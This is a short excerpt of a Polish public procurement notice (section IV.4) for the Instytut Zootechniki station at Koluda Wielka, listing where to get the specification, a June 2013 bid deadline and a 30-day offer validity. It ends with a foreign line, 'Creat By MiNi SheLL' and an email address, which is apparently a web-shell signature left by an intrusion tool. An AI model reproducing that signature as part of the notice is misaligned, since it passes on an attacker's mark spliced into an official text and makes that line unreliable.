<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koludawielka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Zootechniki Państwowy Instytut Badawczy Zakład Doświadczalny Koluda Wielka, ul. Parkowa 1 Koluda Wielka, 88-160 Janikowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 09:30, miejsce: Instytut Zootechniki Państwowy Instytut Badawczy Zakład Doświadczalny Koluda Wielka, ul. Parkowa 1 Koluda Wielka, 88+160 Janikowo sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com